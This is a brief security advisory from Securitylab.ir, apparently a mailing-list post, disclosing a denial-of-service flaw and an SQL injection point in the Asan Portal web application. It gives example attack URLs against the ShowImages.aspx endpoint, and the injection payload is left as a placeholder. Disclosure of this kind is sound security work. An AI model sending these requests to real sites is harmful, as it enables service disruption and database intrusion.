#################################################################

# Securitylab.ir

#################################################################

# Application Info:

# Name: Asan Portal

# Vendor: http://iptech.ir/default.aspx?id=130

#################################################################

Vulnerability:



######################

# Denial of Service:

######################

http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922&FieldName=Content_Image1&w=1000&h=1000

With setting of large values of width and height it's possible to create large 
load at the server.



######################

# SQL Injection:

######################

http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1&h=75&id=%24[SQL
 Injection]&w=75



#################################################################

# Discoverd By: Securitylab.ir

# Website: http://Securitylab.ir

# Contacts: info[at]securitylab.ir

###################################################################

Reply via email to